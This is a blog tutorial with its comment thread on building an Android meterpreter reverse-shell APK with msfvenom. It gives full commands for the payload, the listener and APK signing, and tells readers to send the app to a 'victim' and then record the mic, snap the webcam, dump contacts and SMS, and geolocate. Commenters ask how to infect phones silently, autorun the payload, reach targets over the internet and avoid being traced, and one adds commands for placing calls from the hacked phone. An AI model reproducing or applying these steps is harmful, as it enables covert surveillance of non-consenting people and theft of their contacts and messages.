Wednesday, January 27, 2016

Hack Any Android Phone : msfvenon - Metasploit payload generator

msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.

Hacking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom in kali linux. Metasploit is now a outdated tool.

So, let's get started!!








STEPS :

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.
Command:
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :
         
Command:
root@kali:-# msfconsole

5. Now it's time to open and setup multi-handler. Follows the steps :
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

        Payload Handler is being started........

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate
************************************************************************
Error fixing(incase you get PARSE ERROR)

Two methods:

1)Type command "d2j-apk-sign andro.apk
                                               
                                               or

 2) To fix this error download signapk - Click here to download

Steps to follow
  1. Open Signapk folder then open cmd.
  2. Copy the andro.apk(the app you made) in Signapk folder.
  3. Type java -" jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk "in cmd(not double quotes).
  4. copy it in your phone and install it.
Hope this works... :)



Share the post!!!!!! Enjoy HACKING!!!






                






83 comments:

  1. Nice tutorial bro!!!!!! need more of this kind.

    ReplyDelete
  2. i get this

    java.util.zip.ZipException: zip file is empty
    at java.util.zip.ZipFile.open(Native Method)
    at java.util.zip.ZipFile.(Unknown Source)
    at java.util.zip.ZipFile.(Unknown Source)
    at java.util.jar.JarFile.(Unknown Source)
    at java.util.jar.JarFile.(Unknown Source)
    at com.android.signapk.SignApk.main(SignApk.java:320)
    when i try to sign the app.. did kali mess up making the apk or what?

    ReplyDelete
    Replies
    1. I'm having the same problem. For me it came up when fixing the parse error

      Delete
    2. Guys don't give any space after LHOST= and also after LPORT=

      Delete
    3. i have same problem,anyone can solve? help

      Delete
    4. Type "d2j-apk-sign andro.apk" in terminal to sign the apk.

      Delete
  3. Help ... apk that genre with msfvenom not installed on the phone android ?

    ReplyDelete
  4. Doesn't work. I get "Error: Invalid Payload Selected"

    ReplyDelete
    Replies
    1. There was a slight problem with the code, we have made the changes. Please try again, this time it should work.

      Delete
  5. The apk it installs for me is blank and can't be transferred or sent to anyone. How do I get the right apk?

    ReplyDelete
    Replies
    1. There was a slight problem with the code, we have made the changes. Please try again, this time it will work (the blank 0 bytes apk problem is solved)

      Delete
  6. Hello friend, when I generate the apk (solve the spaces) weighs 8146 bytes (approximately) ... but when trying to install in some devices not installed and other installed but not running ... HELP !!

    ReplyDelete
  7. Hacking Tutorials, Security Tips and Tricks, Mobile Hacking, Wifi Hacking, Pinoy Hackers

    Logon to : http://forum.phu.online

    ReplyDelete
    Replies
    1. Please for me to exploit run. but i do nothing with Because Meterpreter commands
      not work. I want to use "android commands", What is the problem please help me thanks.

      Delete
    2. no session established!
      its stuck at"starting the payload handler"

      Delete
    3. @unknown from July 29th
      check if the IP you set when generating the apk is right and is accessible from the device you start the apk

      Delete
  8. Please for me to exploit run. but i do nothing with Because Meterpreter commands
    not work. I want to use "android commands", What is the problem please help me thanks.

    ReplyDelete
  9. app is installed and i wait to start the but nothing comes from the android device why is that

    ReplyDelete
  10. but this method is only working on android phones that are in the same wifi network as my computer is on.
    let me know if anyone got a way through which i can hack into an android which is using a different wifi network

    ReplyDelete
    Replies
    1. Watch https://www.youtube.com/watch?v=hKF9NZw5iY0 and you have to make some changes for android accordingly.

      Delete
  11. Anyone who wants to make a call from the device afterwards just try this.

    Type "shell" (without quotes) in the meterpreter shell.
    It will give you a local shell on the Android device.
    Now you can make a call by using the activity manager(Just type the following command)

    am start -a android.intent.action.CALL -d tel:XXXXXXXXXX

    (Replace X with the no you want to call)

    If you want to receive an incoming call just type

    input keyevent 5

    To hang up an incoming call

    input keyevent 6

    Tested on my Oneplus 2

    ReplyDelete
    Replies
    1. how do you know when deres an incoming call? when hacking remotely over WAN/Internet.

      Delete
    2. Interesting. Thanks a bunch. Worked like a charm. Except, Im a bit stumbled on.. after you hit that line of code and the phone calls. How exactly would I go about hanging the phone up after the call connects. Thanks :)

      Delete
    3. I have Oneplus 2 as well.
      i have a few queries as i am stuck for a few days now..
      Did you root the device?
      How did you manage to install the apk file on the device?
      Do we have to sign the apk file to install it on the device?
      Thanks in advance

      Delete
    4. This will work for rooted phones onlY!

      Delete
  12. I have Samsung galaxy S4 which I have currently rooted before, and I already tried everything writed in this post but the apk didnt installed in my smartphone and not connected with my kali. what should I do?

    ReplyDelete
  13. Thanks for sharing. Look forward to testing this out.

    ReplyDelete
  14. When i open the App on my and thats is "Main Activity" it doesnt show on msfconsole on linux? help me.

    ReplyDelete
  15. One question. How can I send it someone's phone? I have trouble on that part. Sending the apk file to someone's andrioid? how?

    ReplyDelete
    Replies
    1. Via e-mails or stuff like that.

      Delete
  16. Thanks alot
    Really helpful
    Keep up the good work

    ReplyDelete
  17. this is just crashing on my phone help :/

    ReplyDelete
  18. just wont load main activity

    ReplyDelete
  19. [-] Errno::ECONNRESET An existing connection was forcibly closed by the remote h
    ost. - SSL_accept <----------- the error in msf

    ReplyDelete
  20. hi bro... i did everything right but when i command exploit it doesn't open a session...what to do???

    ReplyDelete
    Replies
    1. It should connect after the MainActivity app has been clicked on. Any errors?

      Delete
    2. no it doesn't show any errors....after exploit command it shows nothing....btw i use router..

      Delete
    3. I take it the andro.apk installed fine and you have MainActivity in your apps list ? Did you make sure to have no space when entering the LHOST=xxx.xxx.x.xxx & LPORT=4444 when creating the payload (in the video it shows a space but down in comments it says there was a small mistake, that and I personally had to re-sign the apk to get it to install using this https://www.dropbox.com/sh/35mrsdzl1phgca6/AACjM7oKMTN8ZeqsOL28Dad0a?dl=0 ) After using the exploit command, try clicking on the app. If nothing happens, I'd suggest trying to create the .apk payload again with the command:

      msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xx LPORT=xxxx R > name.apk

      It shouldnt be too hard. If you want it to be over your own wifi (phone and pc must be connected to same) use the local. If you want to have it where the phone is not connected to your wifi, you'll want to enter your external ip as the LHOST. Hope the info helps, I'm still learning myself, but I've gotten that far.

      Delete
    4. no i didn't give any space.and i signed the app too.but nothing happens.and i use same connection for my pc and android.i tried port forwarding of my router too....but no luck

      Delete
  21. Not with the app no mate nothing any ideas how I can fix it

    ReplyDelete
  22. Not with the app no mate nothing any ideas how I can fix it

    ReplyDelete
  23. ohhh now i have one now -] Errno::ECONNRESET An existing connection was forcibly closed by the remote host. - SSL_accept

    ReplyDelete
  24. i did every thing right but when i opened the apk file and i waited for the meterpreter session to be established but no thing happened i donot know what is wrong

    ReplyDelete
  25. Can i make it autorun
    i mean instead of the person clicking on the icon
    i understand u can add any apk and make this
    but i want it autorun

    Just for Knowledge

    ReplyDelete
  26. This process and the PAYLOAD only works when the attacker and target is on the same network. What to do if target is behind other network then attacker's local network? Really need one tutorial for that and Thank you for this article!

    ReplyDelete
    Replies
    1. If you want that, then you should have a static public ip address directly connected to the attacker machine, and write that static ip address in the LHOST option.

      Delete
  27. "The value specified for payload is not valid"

    This massage will appear after set payload android/meterpreter/reverse_tcp command.How should I solve this problem?

    ReplyDelete
    Replies
    1. Might be a typo, double check

      Delete
  28. bro playload apk doesn't open at android phone and neither says anything help me what to do

    ReplyDelete
  29. Error: Invalid Payload Selected
    help

    ReplyDelete
  30. Very tutorial there man, do I need to have a static IP or is it still ok on dhcp? Can we do the same for a phone that's not android?like a Java phone. And windows phone too? If yes how please?

    ReplyDelete
  31. How can I install this programs remotely without the victim performing any task.

    ReplyDelete
  32. okay. so thank you for this tutorial everything works well all through to exploit. but after i press enter it stops at starting the payload handler.. even after i click on the APP several times. please assist me on how to establish a connection between the phone and msf. thank you.
    anonymous

    ReplyDelete
  33. Nice post man!
    And for wan attacks u can use dynamic iP dns (like no-ip) the host will be like
    something.noip.net
    Just add
    LHOST=something.noip.net

    it's for those who have dynamic public iP. If u have static iP just use that iP no need to create dns host.

    ReplyDelete
    Replies
    1. can you elaborate that? Is there any settings that I should done if I have dynamic IP? and what do you mean by something.noip.net?

      Delete
  34. Nice post man!
    And for wan attacks u can use dynamic iP dns (like no-ip) the host will be like
    something.noip.net
    Just add
    LHOST=something.noip.net

    it's for those who have dynamic public iP. If u have static iP just use that iP no need to create dns host.

    ReplyDelete
  35. this is not complete process. it works for all smart phone. which are on same network or on other network. it is incomplete process. when we follow it we found a .apk file about some kilobytes but in reality it need to be 1.458 mb. if you will be able to creat 1.458MB apk file. you can easily hack any android who install.

    ReplyDelete
  36. This tutorial is really nice! I tried it and successfully did it on same network. But now i want to do on global level. I have heard that it can be done by port forwarding; i tried doing it but didnt get the result. Please help me.

    ReplyDelete
  37. Hi, first of all, thank you for the tutorial, and i'm telling all of you that it works, but my question is what next, what can i do next, can i download photos or videos or install any apps on the hacking phone, 'cause i don't know how, i mean i know how to record video and make photo snaps, but can we do anythink else

    ReplyDelete
  38. dump_contacts
    - dump_sms
    - geolocate
    unknown command error
    Plz help

    ReplyDelete
  39. what about the things i can do later? i can anly see the things in device with shell command but cant move it

    ReplyDelete
  40. stucked at 'starting the payload handler' at listener section

    ReplyDelete
  41. same too
    stucked at 'starting the payload handler' at listener section

    ReplyDelete
  42. I was unable to install the apk on the victim's smartphone, it said app wasn't instaled could u help me ?

    ReplyDelete
  43. it doesn't work after creating payload the the size of apk is 0bytes hence it gives me error invalid payload selected........... how to resolve it ??????

    ReplyDelete
    Replies
    1. Zero bytes means your msfvenon command exited with an error and payload wasn't created.

      Delete
  44. how to autostart the app after "clearing of ram" or "reboot"?

    ReplyDelete
  45. One thing, can my IP be traced back? And what if I use a ProxyChain?

    ReplyDelete
    Replies
    1. You shouldn't be doing anything that requires you to be worried if your IP can be traced back. This isn't the right place for this question.

      Delete
  46. when i try to install apk it's showed me
    E:\Adobe\New folder>java - jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk
    DNS server not authoritative for zone.

    i cant abale to install apk file in my android it show me ERROR

    ReplyDelete
  47. Guys this tutorial is the first it was working. Stop complaining and fallow all the instruction.

    If you are stuck then google abit for more help... This is 100% good and it is working perfect. Thanks for this and please do more tutorials...

    Sorry for my english...

    ReplyDelete
  48. ith gets stuck by showing starting the payload handler
    iam using the vmware with kalilinux in my w8 pc..... help needed

    ReplyDelete
  49. is it possible to controll remotely ? without be on the same network ?

    ReplyDelete
  50. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.11 PORT=4444 R > andro.apk
    No platform was selected, choosing Msf::Module::Platform::Android from the payload
    No Arch selected, selecting Arch: dalvik from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 9488 bytes
    i get this but the app says not installed whats th eproblem ?

    ReplyDelete
  51. SIR i cant able to make the session

    ReplyDelete
  52. can i give any value for lport in vm in lan?

    ReplyDelete
  53. get meterpreter to open but just fails to do anything i open a session then try to dump contacts session closes for reason died
    Anyone help

    ReplyDelete
  54. Help me please! When I create a payload with msfvenom -p android/meterpreter/reverse_tcp lhost=my externalIP lport=4444 R>payload.apk, the apk is created but when I start exploit I don't receive any session and I get an error..... In LAN it works but how can it works in WAN?

    ReplyDelete
  55. Linux tells me bash:msfvenom:command not found

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC